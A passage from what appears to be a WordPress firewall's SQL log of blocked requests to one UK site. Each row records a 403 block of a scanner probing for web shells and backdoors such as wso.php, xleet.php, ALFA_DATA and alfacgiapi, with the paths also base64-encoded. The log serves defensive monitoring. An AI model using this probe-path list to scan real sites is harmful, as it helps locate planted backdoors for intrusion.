User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3VwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11138,1673894217.389985,1673894217.278200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/shell.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NoZWxsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11139,1673894216.879976,1673894216.695500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wso.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dzby5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11140,1673894216.296370,1673894216.181400,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/xleet.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3hsZWV0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11141,1673894215.786688,1673894215.674300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/olux.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L29sdXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11142,1673894215.282257,1673894215.153700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/index.php?3x=3x','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2luZGV4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11143,1673894214.738993,1673894214.624500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ubh/up.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91YmgvdXAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11144,1673894213.666027,1673894213.542900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11145,1673894212.611595,1673894212.495300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(11146,1673894211.485769,1673894211.349000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11147,1673894197.895690,1673894197.788500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvY2dpYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11148,1673894196.856406,1673894196.725500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvYWxmYWNnaWFwaQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11149,1673894195.588237,1673894195.478100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvQUxGQV9EQVRB\",\"category\":\"brute-force\",\"ssl\":1}'),(11150,1673894194.256280,1673894194.120400,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11151,1673894193.159650,1673894193.047300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(11152,1673894192.122096,1673894192.000100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11153,1673894191.075017,1673894190.947700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvY2dpYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11154,1673894189.874115,1673894189.763100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvYWxmYWNnaWFwaQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11155,1673894188.651168,1673894188.531300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvQUxGQV9EQVRB\",\"category\":\"brute-force\",\"ssl\":1}'),(11156,1673894187.286932,1673894187.153900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11157,1673894186.028322,1673894185.909200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11158,1673894184.969346,1673894184.854600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11159,1673894183.798386,1673894183.683100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11160,1673894182.449263,1673894182.337800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11161,1673894181.406608,1673894181.291800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11162,1673894180.287695,1673894180.179300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11163,1673894179.229869,1673894179.114800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(11164,1673894178.084263,1673894177.946900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11165,1673894176.870162,1673894176.706600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11166,1673894175.639108,1673894175.516400,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11167,1673894174.578998,1673894174.470000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11168,1673894173.467732,1673894173.360200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11169,1673894172.383143,1673894172.263400,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11170,1673894171.166932,1673894171.059400,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11171,1673894168.740504,1673894168.630500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/error.php?phpshells=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2Vycm9yLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11172,1673894167.235478,1673894167.116500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-backup-sql-302.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWJhY2t1cC1zcWwtMzAyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11173,1673894166.170961,1673894166.061800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/system_log.php?bala=up','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3N5c3RlbV9sb2cucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11174,1673894165.092331,1673894164.977900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/outcms.php?up=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvb3V0Y21zLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11175,1673894161.320364,1673894161.214000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/db-cache.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvZGItY2FjaGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11176,1673894160.271123,1673894160.159000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/gank.php.PhP','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2dhbmsucGhwLlBoUA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11177,1673894159.199166,1673894159.073600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-plugins.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLXBsdWdpbnMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11178,1673894154.654889,1673894154.539200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/legion.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2xlZ2lvbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11179,1673894152.926215,1673894152.775400,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/config.bak.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2NvbmZpZy5iYWsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11180,1673894152.353718,1673894152.245500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/config.bak.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NvbmZpZy5iYWsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11181,1673894150.273920,1673894150.160600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/mu-plugins/db-safe-mode.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvbXUtcGx1Z2lucy9kYi1zYWZlLW1vZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11182,1673894149.178521,1673894149.064900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/backup_index.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXBfaW5kZXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11183,1673898239.599444,1673898239.462400,'\0\0\0\0\0\0\0\0\0\0��[��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/backup_index.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXBfaW5kZXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11184,1673898193.433149,1673898193.298500,'\0\0\0\0\0\0\0\0\0\0��[��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-booking.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWJvb2tpbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11185,1673898031.010685,1673898030.901300,'\0\0\0\0\0\0\0\0\0\0��[',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/wp-class.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11186,1673898027.505026,1673898027.326400,'\0\0\0\0\0\0\0\0\0\0��[',0,403,0,0,0,'https://www.dailyjolly.co.uk/media-admin.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L21lZGlhLWFkbWluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11187,1673898026.508928,1673898026.381400,'\0\0\0\0\0\0\0\0\0\0��[',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-signin.php?dizo=&ping=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLXNpZ25pbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11188,1673898025.528839,1673898025.418200,'\0\0\0\0\0\0\0\0\0\0��[',0,403,0,0,0,'https://www.dailyjolly.co.uk/ups.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3Vwcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11189,1673898022.319700,1673898022.137300,'\0\0\0\0\0\0\0\0\0\0��[',0,403,0,0,0,'https://www.dailyjolly.co.uk/doc.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2RvYy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11190,1673898021.222860,1673898021.111600,'\0\0\0\0\0\0\0\0\0\0��[',0,403,0,0,0,'https://www.dailyjolly.co.uk/radio.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious 